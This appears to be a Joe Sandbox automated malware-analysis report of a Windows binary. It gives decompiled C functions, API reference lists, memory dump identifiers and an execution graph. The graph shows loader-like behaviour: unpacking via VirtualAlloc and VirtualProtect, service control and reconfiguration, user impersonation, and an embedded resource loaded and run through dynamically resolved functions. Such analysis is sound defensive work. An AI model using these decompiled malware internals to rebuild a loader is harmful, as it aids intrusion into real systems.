                                                          • Instruction ID: 21cf1bce7c6a814918371ab530f5a892fce8c721486c6f53bf6b632cfe63fa9b
                                                          • Opcode Fuzzy Hash: 2f4745317c91ce0d1db58eb30ad03852bff464516183b2ec4e69fb8d1fb13d8e
                                                          • Instruction Fuzzy Hash: C801D672200615BBDF215E699C68DBB7AACFB85761F000169FE9093148DB7BCD1097A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01093680(void* __ecx) {
                                                          				void* _v8;
                                                          				struct tagMSG _v36;
                                                          				int _t8;
                                                          				struct HWND__* _t16;
                                                          
                                                          				_v8 = __ecx;
                                                          				_t16 = 0;
                                                          				while(1) {
                                                          					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                          					if(_t8 == 0) {
                                                          						break;
                                                          					}
                                                          					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                          						continue;
                                                          					} else {
                                                          						do {
                                                          							if(_v36.message != 0x12) {
                                                          								DispatchMessageA( &_v36);
                                                          							} else {
                                                          								_t16 = 1;
                                                          							}
                                                          							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                          						} while (_t8 != 0);
                                                          						if(_t16 == 0) {
                                                          							continue;
                                                          						}
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t8;
                                                          			}







                                                          0x0109368c
                                                          0x0109368f
                                                          0x01093691
                                                          0x0109369f
                                                          0x010936a7
                                                          0x00000000
                                                          0x00000000
                                                          0x010936ba
                                                          0x00000000
                                                          0x010936bc
                                                          0x010936bc
                                                          0x010936c0
                                                          0x010936cb
                                                          0x010936c2
                                                          0x010936c4
                                                          0x010936c4
                                                          0x010936da
                                                          0x010936e0
                                                          0x010936e6
                                                          0x00000000
                                                          0x00000000
                                                          0x010936e6
                                                          0x00000000
                                                          0x010936ba
                                                          0x010936ed

                                                          APIs
                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0109369F
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010936B2
                                                          • DispatchMessageA.USER32(?), ref: 010936CB
                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010936DA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                          • String ID:
                                                          • API String ID: 2776232527-0
                                                          • Opcode ID: b449dd9d9ac278ebfdeedf63df99b65350ef8eee57ac488c8121132b7b9e4c32
                                                          • Instruction ID: 023e10a302e129fffbbeac8a2aa21187943e7d322ffa92950358c72c3c4cf439
                                                          • Opcode Fuzzy Hash: b449dd9d9ac278ebfdeedf63df99b65350ef8eee57ac488c8121132b7b9e4c32
                                                          • Instruction Fuzzy Hash: A8018472A00214BBDF304AAA5C58EEB7ABCFB89B10F004159BA95E6184D5658540DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E010965E8(char* __ecx) {
                                                          				char _t3;
                                                          				char _t10;
                                                          				char* _t12;
                                                          				char* _t14;
                                                          				char* _t15;
                                                          				CHAR* _t16;
                                                          
                                                          				_t12 = __ecx;
                                                          				_t15 = __ecx;
                                                          				_t14 =  &(__ecx[1]);
                                                          				_t10 = 0;
                                                          				do {
                                                          					_t3 =  *_t12;
                                                          					_t12 =  &(_t12[1]);
                                                          				} while (_t3 != 0);
                                                          				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                          				while(1) {
                                                          					_t16 = CharPrevA(_t15, ??);
                                                          					if(_t16 <= _t15) {
                                                          						break;
                                                          					}
                                                          					if( *_t16 == 0x5c) {
                                                          						L7:
                                                          						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                          							_t16 = CharNextA(_t16);
                                                          						}
                                                          						 *_t16 = _t10;
                                                          						_t10 = 1;
                                                          					} else {
                                                          						_push(_t16);
                                                          						continue;
                                                          					}
                                                          					L11:
                                                          					return _t10;
                                                          				}
                                                          				if( *_t16 == 0x5c) {
                                                          					goto L7;
                                                          				}
                                                          				goto L11;
                                                          			}









                                                          0x010965e8
                                                          0x010965ed
                                                          0x010965ef
                                                          0x010965f2
                                                          0x010965f4
                                                          0x010965f4
                                                          0x010965f6
                                                          0x010965f7
                                                          0x01096608
                                                          0x01096611
                                                          0x01096618
                                                          0x0109661c
                                                          0x00000000
                                                          0x00000000
                                                          0x0109660e
                                                          0x01096623
                                                          0x01096625
                                                          0x0109663b
                                                          0x0109663b
                                                          0x0109663d
                                                          0x01096641
                                                          0x01096610
                                                          0x01096610
                                                          0x00000000
                                                          0x01096610
                                                          0x01096644
                                                          0x01096647
                                                          0x01096647
                                                          0x01096621
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,01092B33), ref: 01096602
                                                          • CharPrevA.USER32(?,00000000), ref: 01096612
                                                          • CharPrevA.USER32(?,00000000), ref: 01096629
                                                          • CharNextA.USER32(00000000), ref: 01096635
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Char$Prev$Next
                                                          • String ID:
                                                          • API String ID: 3260447230-0
                                                          • Opcode ID: bba96d325b99aa444eecbb0e1fcd085a99dc7db1264cb7efd12ee0a30d9732ac
                                                          • Instruction ID: 55392f035b6f3b7a8e80cfc838b32a764f12512de4e23d940bec492761a5202b
                                                          • Opcode Fuzzy Hash: bba96d325b99aa444eecbb0e1fcd085a99dc7db1264cb7efd12ee0a30d9732ac
                                                          • Instruction Fuzzy Hash: C4F02872104150AEEF331A2D8CA8DBBBFDCDF8F1A472901EFE8D583101D61B090697A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010969B0() {
                                                          				intOrPtr* _t4;
                                                          				intOrPtr* _t5;
                                                          				void* _t6;
                                                          				intOrPtr _t11;
                                                          				intOrPtr _t12;
                                                          
                                                          				 *0x10981f8 = E01096C70();
                                                          				__set_app_type(E01096FBE(2));
                                                          				 *0x10988a4 =  *0x10988a4 | 0xffffffff;
                                                          				 *0x10988a8 =  *0x10988a8 | 0xffffffff;
                                                          				_t4 = __p__fmode();
                                                          				_t11 =  *0x1098528; // 0x0
                                                          				 *_t4 = _t11;
                                                          				_t5 = __p__commode();
                                                          				_t12 =  *0x109851c; // 0x0
                                                          				 *_t5 = _t12;
                                                          				_t6 = E01097000();
                                                          				if( *0x1098000 == 0) {
                                                          					__setusermatherr(E01097000);
                                                          				}
                                                          				E010971EF(_t6);
                                                          				return 0;
                                                          			}








                                                          0x010969b7
                                                          0x010969c2
                                                          0x010969c8
                                                          0x010969cf
                                                          0x010969d8
                                                          0x010969de
                                                          0x010969e4
                                                          0x010969e6
                                                          0x010969ec
                                                          0x010969f2
                                                          0x010969f4
                                                          0x01096a00
                                                          0x01096a07
                                                          0x01096a0d
                                                          0x01096a0e
                                                          0x01096a15

                                                          APIs
                                                            • Part of subcall function 01096FBE: GetModuleHandleW.KERNEL32(00000000), ref: 01096FC5
                                                          • __set_app_type.MSVCRT ref: 010969C2
                                                          • __p__fmode.MSVCRT ref: 010969D8
                                                          • __p__commode.MSVCRT ref: 010969E6
                                                          • __setusermatherr.MSVCRT ref: 01096A07
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                          • String ID:
                                                          • API String ID: 1632413811-0
                                                          • Opcode ID: 807c2e47dd79f96debab0f784b83747d2336b91f82f25dcc818ae95389768d91
                                                          • Instruction ID: a687e017df6897864b3efb6da79aaa35911c336fb4bf9e7502d1a96d3e20e309
                                                          • Opcode Fuzzy Hash: 807c2e47dd79f96debab0f784b83747d2336b91f82f25dcc818ae95389768d91
                                                          • Instruction Fuzzy Hash: 31F0F8B560830ACFCB78AB38E5397053BA1FB46321B10864AE4E1863D8CB3F8154DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:3.5%
                                                          Dynamic/Decrypted Code Coverage:31.1%
                                                          Signature Coverage:15.1%
                                                          Total number of Nodes:351
                                                          Total number of Limit Nodes:34
                                                          execution_graph 25650 1fc003c 25651 1fc0049 25650->25651 25663 1fc0e0f SetErrorMode SetErrorMode 25651->25663 25656 1fc0265 25657 1fc02ce VirtualProtect 25656->25657 25659 1fc030b 25657->25659 25658 1fc0439 VirtualFree 25662 1fc04be LoadLibraryA 25658->25662 25659->25658 25661 1fc08c7 25662->25661 25664 1fc0223 25663->25664 25665 1fc0d90 25664->25665 25666 1fc0dad 25665->25666 25667 1fc0dbb GetPEB 25666->25667 25668 1fc0238 VirtualAlloc 25666->25668 25667->25668 25668->25656 25669 2239920 25670 223996b OpenSCManagerW 25669->25670 25672 22399b4 25670->25672 25673 2230980 25674 2230989 25673->25674 25676 2234a25 25673->25676 25679 22390d0 25676->25679 25681 22390e3 25679->25681 25683 2239180 25681->25683 25684 22391c8 VirtualProtect 25683->25684 25686 2234a47 25684->25686 25698 1fc092b GetPEB 25699 1fc0972 25698->25699 25687 223a1a8 25688 223a226 ChangeServiceConfigA 25687->25688 25690 223a4b2 25688->25690 25691 223a0e8 25692 223a130 ControlService 25691->25692 25693 223a167 25692->25693 25694 22399e8 25696 2239a3d OpenServiceA 25694->25696 25697 2239ad4 25696->25697 25700 2239ed8 25701 2239f19 ImpersonateLoggedOnUser 25700->25701 25702 2239f46 25701->25702 25703 1fc0920 TerminateProcess 25704 40cbdd 25705 40cbe9 __fsopen 25704->25705 25739 40d534 HeapCreate 25705->25739 25708 40cc46 25741 41087e GetModuleHandleW 25708->25741 25712 40cc57 __RTC_Initialize 25775 411a15 25712->25775 25715 40cc66 25716 40cc72 GetCommandLineA 25715->25716 25906 40e79a 63 API calls 3 library calls 25715->25906 25790 412892 25716->25790 25719 40cc71 25719->25716 25723 40cc97 25826 41255f 25723->25826 25727 40cca8 25841 40e859 25727->25841 25730 40ccb0 25731 40ccbb 25730->25731 25909 40e79a 63 API calls 3 library calls 25730->25909 25847 4019f0 OleInitialize 25731->25847 25734 40ccd8 25735 40ccea 25734->25735 25901 40ea0a 25734->25901 25910 40ea36 63 API calls _doexit 25735->25910 25738 40ccef __fsopen 25740 40cc3a 25739->25740 25740->25708 25904 40cbb4 63 API calls 3 library calls 25740->25904 25742 410892 25741->25742 25743 410899 25741->25743 25911 40e76a Sleep GetModuleHandleW 25742->25911 25745 410a01 25743->25745 25746 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 25743->25746 25933 410598 7 API calls __decode_pointer 25745->25933 25749 4108ec TlsAlloc 25746->25749 25748 410898 25748->25743 25751 40cc4c 25749->25751 25752 41093a TlsSetValue 25749->25752 25751->25712 25905 40cbb4 63 API calls 3 library calls 25751->25905 25752->25751 25753 41094b 25752->25753 25912 40ea54 6 API calls 4 library calls 25753->25912 25755 410950 25913 41046e TlsGetValue 25755->25913 25758 41046e __encode_pointer 6 API calls 25759 41096b 25758->25759 25760 41046e __encode_pointer 6 API calls 25759->25760 25761 41097b 25760->25761 25762 41046e __encode_pointer 6 API calls 25761->25762 25763 41098b 25762->25763 25923 40d564 InitializeCriticalSectionAndSpinCount ___lock_fhandle 25763->25923 25765 410998 25765->25745 25924 4104e9 6 API calls __crt_waiting_on_module_handle 25765->25924 25767 4109ac 25767->25745 25925 411cba 25767->25925 25771 4109df 25771->25745 25772 4109e6 25771->25772 25932 4105d5 63 API calls 5 library calls 25772->25932 25774 4109ee GetCurrentThreadId 25774->25751 25962 40e1d8 25775->25962 25777 411a21 GetStartupInfoA 25778 411cba __calloc_crt 63 API calls 25777->25778 25784 411a42 25778->25784 25779 411c60 __fsopen 25779->25715 25780 411bdd GetStdHandle 25785 411ba7 25780->25785 25781 411c42 SetHandleCount 25781->25779 25782 411cba __calloc_crt 63 API calls 25782->25784 25783 411bef GetFileType 25783->25785 25784->25779 25784->25782 25784->25785 25787 411b2a 25784->25787 25785->25779 25785->25780 25785->25781 25785->25783 25964 41389c InitializeCriticalSectionAndSpinCount __fsopen 25785->25964 25786 411b53 GetFileType 25786->25787 25787->25779 25787->25785 25787->25786 25963 41389c InitializeCriticalSectionAndSpinCount __fsopen 25787->25963 25791 4128b0 GetEnvironmentStringsW 25790->25791 25792 4128cf 25790->25792 25793 4128b8 25791->25793 25794 4128c4 GetLastError 25791->25794 25792->25793 25797 412968 25792->25797 25795 4128eb GetEnvironmentStringsW 25793->25795 25800 4128fa 25793->25800 25794->25792 25798 40cc82 25795->25798 25795->25800 25796 412971 GetEnvironmentStrings 25796->25798 25799 412981 25796->25799 25797->25796 25797->25798 25815 4127d7 25798->25815 25804 411c75 __malloc_crt 63 API calls 25799->25804 25800->25800 25801 41290f WideCharToMultiByte 25800->25801 25802 41295d FreeEnvironmentStringsW 25801->25802 25803 41292e 25801->25803 25802->25798 25965 411c75 25803->25965 25806 41299b 25804->25806 25808 4129a2 FreeEnvironmentStringsA 25806->25808 25809 4129ae _realloc 25806->25809 25808->25798 25813 4129b8 FreeEnvironmentStringsA 25809->25813 25810 41293c WideCharToMultiByte 25811 412956 25810->25811 25812 41294e 25810->25812 25811->25802 25971 40b6b5 63 API calls 2 library calls 25812->25971 25813->25798 25816 4127f1 GetModuleFileNameA 25815->25816 25817 4127ec 25815->25817 25819 412818 25816->25819 26011 41446b 107 API calls __setmbcp 25817->26011 26005 41263d 25819->26005 25822 411c75 __malloc_crt 63 API calls 25823 41285a 25822->25823 25824 41263d _parse_cmdline 73 API calls 25823->25824 25825 40cc8c 25823->25825 25824->25825 25825->25723 25907 40e79a 63 API calls 3 library calls 25825->25907 25827 412568 25826->25827 25828 41256d _strlen 25826->25828 26013 41446b 107 API calls __setmbcp 25827->26013 25830 40cc9d 25828->25830 25831 411cba __calloc_crt 63 API calls 25828->25831 25830->25727 25908 40e79a 63 API calls 3 library calls 25830->25908 25836 4125a2 _strlen 25831->25836 25832 412600 26016 40b6b5 63 API calls 2 library calls 25832->26016 25834 411cba __calloc_crt 63 API calls 25834->25836 25835 412626 26017 40b6b5 63 API calls 2 library calls 25835->26017 25836->25830 25836->25832 25836->25834 25836->25835 25839 4125e7 25836->25839 26014 40ef42 63 API calls 2 library calls 25836->26014 25839->25836 26015 40e61c 10 API calls 3 library calls 25839->26015 25842 40e867 __IsNonwritableInCurrentImage 25841->25842 26018 413586 25842->26018 25844 40e885 __initterm_e 25846 40e8a4 __IsNonwritableInCurrentImage __initterm 25844->25846 26022 40d2bd 74 API calls __cinit 25844->26022 25846->25730 25848 401ab9 25847->25848 26023 40b99e 25848->26023 25850 401abf 25851 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 25850->25851 25880 402467 25850->25880 25852 401dc3 CloseHandle GetModuleHandleA 25851->25852 25859 401c55 25851->25859 26036 401650 25852->26036 25854 401e8b FindResourceA LoadResource LockResource SizeofResource 25855 40b84d _malloc 63 API calls 25854->25855 25856 401ebf 25855->25856 26038 40af66 25856->26038 25858 401c9c CloseHandle 25858->25734 25859->25858 25864 401cf9 Module32Next 25859->25864 25860 401ecb _memset 25861 401efc SizeofResource 25860->25861 25862 401f1c 25861->25862 25863 401f5f 25861->25863 25862->25863 26076 401560 __VEC_memcpy __shift 25862->26076 25865 401f92 _memset 25863->25865 26077 401560 __VEC_memcpy __shift 25863->26077 25864->25852 25875 401d0f 25864->25875 25868 401fa2 FreeResource 25865->25868 25869 40b84d _malloc 63 API calls 25868->25869 25870 401fbb SizeofResource 25869->25870 25871 401fe5 _memset 25870->25871 25872 4020aa LoadLibraryA 25871->25872 25873 401650 25872->25873 25874 40216c GetProcAddress 25873->25874 25877 4021aa 25874->25877 25874->25880 25875->25858 25876 401dad Module32Next 25875->25876 25876->25852 25876->25875 25877->25880 26050 4018f0 25877->26050 25880->25734 25881 4021f1 25899 40243f 25881->25899 26062 401870 25881->26062 25883 402269 VariantInit 25884 401870 76 API calls 25883->25884 25885 40228b VariantInit 25884->25885 25886 4022a7 25885->25886 25887 4022d9 SafeArrayCreate SafeArrayAccessData 25886->25887 26067 40b350 25887->26067 25890 40232c 25891 402354 SafeArrayDestroy 25890->25891 25900 40235b 25890->25900 25891->25900 25892 402392 SafeArrayCreateVector 25893 4023a4 25892->25893 25894 4023bc VariantClear VariantClear 25893->25894 26069 4019a0 25894->26069 25897 40242e 25898 4019a0 66 API calls 25897->25898 25898->25899 25899->25880 26078 40b6b5 63 API calls 2 library calls 25899->26078 25900->25892 26091 40e8de 25901->26091 25903 40ea1b 25903->25735 25904->25708 25905->25712 25906->25719 25907->25723 25908->25727 25909->25731 25910->25738 25911->25748 25912->25755 25914 4104a7 GetModuleHandleW 25913->25914 25915 410486 25913->25915 25917 4104c2 GetProcAddress 25914->25917 25918 4104b7 25914->25918 25915->25914 25916 410490 TlsGetValue 25915->25916 25921 41049b 25916->25921 25920 41049f 25917->25920 25934 40e76a Sleep GetModuleHandleW 25918->25934 25920->25758 25921->25914 25921->25920 25922 4104bd 25922->25917 25922->25920 25923->25765 25924->25767 25927 411cc3 25925->25927 25928 4109c5 25927->25928 25929 411ce1 Sleep 25927->25929 25935 40e231 25927->25935 25928->25745 25931 4104e9 6 API calls __crt_waiting_on_module_handle 25928->25931 25930 411cf6 25929->25930 25930->25927 25930->25928 25931->25771 25932->25774 25934->25922 25936 40e23d __fsopen 25935->25936 25937 40e255 25936->25937 25945 40e274 _memset 25936->25945 25948 40bfc1 63 API calls __getptd_noexit 25937->25948 25939 40e25a 25949 40e744 6 API calls 2 library calls 25939->25949 25941 40e2e6 RtlAllocateHeap 25941->25945 25944 40e26a __fsopen 25944->25927 25945->25941 25945->25944 25950 40d6e0 25945->25950 25957 40def2 5 API calls 2 library calls 25945->25957 25958 40e32d LeaveCriticalSection _doexit 25945->25958 25959 40d2e3 6 API calls __decode_pointer 25945->25959 25948->25939 25951 40d6f5 25950->25951 25952 40d708 EnterCriticalSection 25950->25952 25960 40d61d 63 API calls 10 library calls 25951->25960 25952->25945 25954 40d6fb 25954->25952 25961 40e79a 63 API calls 3 library calls 25954->25961 25956 40d707 25956->25952 25957->25945 25958->25945 25959->25945 25960->25954 25961->25956 25962->25777 25963->25787 25964->25785 25968 411c7e 25965->25968 25967 411cb4 25967->25802 25967->25810 25968->25967 25969 411c95 Sleep 25968->25969 25972 40b84d 25968->25972 25970 411caa 25969->25970 25970->25967 25970->25968 25971->25811 25973 40b900 25972->25973 25974 40b85f 25972->25974 25999 40d2e3 6 API calls __decode_pointer 25973->25999 25977 40b870 25974->25977 25982 40b8bc RtlAllocateHeap 25974->25982 25984 40b8f8 25974->25984 25985 40b8ec 25974->25985 25988 40b8f1 25974->25988 25995 40b7fe 63 API calls 4 library calls 25974->25995 25996 40d2e3 6 API calls __decode_pointer 25974->25996 25976 40b906 26000 40bfc1 63 API calls __getptd_noexit 25976->26000 25977->25974 25990 40ec4d 63 API calls 2 library calls 25977->25990 25991 40eaa2 63 API calls 7 library calls 25977->25991 25992 40e7ee 25977->25992 25982->25974 25984->25968 25997 40bfc1 63 API calls __getptd_noexit 25985->25997 25998 40bfc1 63 API calls __getptd_noexit 25988->25998 25990->25977 25991->25977 26001 40e7c3 GetModuleHandleW 25992->26001 25995->25974 25996->25974 25997->25988 25998->25984 25999->25976 26000->25984 26002 40e7d7 GetProcAddress 26001->26002 26003 40e7ec ExitProcess 26001->26003 26002->26003 26004 40e7e7 CorExitProcess 26002->26004 26004->26003 26007 41265c 26005->26007 26009 4126c9 26007->26009 26012 416836 73 API calls x_ismbbtype_l 26007->26012 26008 4127c7 26008->25822 26008->25825 26009->26008 26010 416836 73 API calls _parse_cmdline 26009->26010 26010->26009 26011->25816 26012->26007 26013->25828 26014->25836 26015->25839 26016->25830 26017->25830 26019 41358c 26018->26019 26020 41046e __encode_pointer 6 API calls 26019->26020 26021 4135a4 26019->26021 26020->26019 26021->25844 26022->25846 26024 40b9aa __fsopen _strnlen 26023->26024 26025 40b9b8 26024->26025 26029 40b9ec 26024->26029 26079 40bfc1 63 API calls __getptd_noexit 26025->26079 26027 40b9bd 26080 40e744 6 API calls 2 library calls 26027->26080 26030 40d6e0 __lock 63 API calls 26029->26030 26031 40b9f3 26030->26031 26081 40b917 121 API calls 3 library calls 26031->26081 26033 40b9ff 26082 40ba18 LeaveCriticalSection _doexit 26033->26082 26034 40b9cd __fsopen 26034->25850 26037 4017cc _realloc 26036->26037 26037->25854 26040 40af70 26038->26040 26039 40b84d _malloc 63 API calls 26039->26040 26040->26039 26041 40af8a 26040->26041 26045 40af8c std::bad_alloc::bad_alloc 26040->26045 26083 40d2e3 6 API calls __decode_pointer 26040->26083 26041->25860 26043 40afb2 26085 40af49 63 API calls std::exception::exception 26043->26085 26045->26043 26084 40d2bd 74 API calls __cinit 26045->26084 26046 40afbc 26086 40cd39 RaiseException 26046->26086 26049 40afca 26051 401903 lstrlenA 26050->26051 26052 4018fc 26050->26052 26087 4017e0 73 API calls 3 library calls 26051->26087 26052->25881 26054 40191f MultiByteToWideChar 26055 401940 GetLastError 26054->26055 26056 401996 26054->26056 26057 40194b MultiByteToWideChar 26055->26057 26058 40198d 26055->26058 26056->25881 26088 4017e0 73 API calls 3 library calls 26057->26088 26058->26056 26089 401030 GetLastError 26058->26089 26060 401970 MultiByteToWideChar 26060->26058 26063 40af66 75 API calls 26062->26063 26064 40187c 26063->26064 26065 401885 SysAllocString 26064->26065 26066 4018a4 26064->26066 26065->26066 26066->25883 26068 40231a SafeArrayUnaccessData 26067->26068 26068->25890 26070 4019aa InterlockedDecrement 26069->26070 26071 4019df VariantClear 26069->26071 26070->26071 26072 4019b8 26070->26072 26071->25897 26072->26071 26073 4019c2 SysFreeString 26072->26073 26074 4019c9 26072->26074 26073->26074 26090 40aec0 64 API calls 2 library calls 26074->26090 26076->25862 26077->25865 26078->25880 26079->26027 26081->26033 26082->26034 26083->26040 26084->26043 26085->26046 26086->26049 26087->26054 26088->26060 26090->26071 26092 40e8ea __fsopen 26091->26092 26093 40d6e0 __lock 63 API calls 26092->26093 26094 40e8f1 26093->26094 26095 40e9ba __initterm 26094->26095 26096 40e91d 26094->26096 26110 40e9f5 26095->26110 26115 4104e9 6 API calls __crt_waiting_on_module_handle 26096->26115 26100 40e928 26102 40e9aa __initterm 26100->26102 26116 4104e9 6 API calls __crt_waiting_on_module_handle 26100->26116 26101 40e9f2 __fsopen 26101->25903 26102->26095 26105 40e9e9 26106 40e7ee _fast_error_exit 4 API calls 26105->26106 26106->26101 26107 4104e0 6 API calls ___crtMessageBoxW 26108 40e93d 26107->26108 26108->26102 26108->26107 26109 4104e9 6 API calls __decode_pointer 26108->26109 26109->26108 26111 40e9d6 26110->26111 26112 40e9fb 26110->26112 26111->26101 26114 40d606 LeaveCriticalSection 26111->26114 26117 40d606 LeaveCriticalSection 26112->26117 26114->26105 26115->26100 26116->26108 26117->26111

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 30 401ef3-401f1a call 401300 SizeofResource 26->30 27->30 41 401f1c-401f2f 30->41 42 401f5f-401f69 30->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->32 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 54 401d10-401d2e call 401650 50->54 61 401d30-401d34 54->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 69 401d5d-401d7b call 401650 65->69 67->63 71 401d42-401d4a 67->71 68->65 76 401d80-401d84 69->76 71->61 71->68 79 401da0-401da2 76->79 80 401d86-401d88 76->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->76 86->83 87->7 87->54 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 1f9d01d 122->152 153 40234e call 1f9d005 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 154 402390 call 1f9d01d 135->154 155 402390 call 1f9d005 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
                                                          C-Code - Quality: 77%
                                                          			E004019F0(void* __edx, void* __eflags) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				void* _t337;
                                                          				void* _t340;
                                                          				int _t341;
                                                          				CHAR* _t344;
                                                          				intOrPtr* _t349;
                                                          				int _t350;
                                                          				long _t352;
                                                          				signed int _t354;
                                                          				intOrPtr _t358;
                                                          				long _t359;
                                                          				CHAR* _t364;
                                                          				struct HINSTANCE__* _t365;
                                                          				CHAR* _t366;
                                                          				_Unknown_base(*)()* _t367;
                                                          				int _t368;
                                                          				int _t369;
                                                          				int _t370;
                                                          				intOrPtr* _t376;
                                                          				int _t378;
                                                          				intOrPtr _t379;
                                                          				intOrPtr* _t381;
                                                          				int _t383;
                                                          				intOrPtr* _t384;
                                                          				int _t385;
                                                          				int _t396;
                                                          				int _t399;
                                                          				int _t402;
                                                          				int _t405;
                                                          				intOrPtr* _t407;
                                                          				int _t413;
                                                          				int _t415;
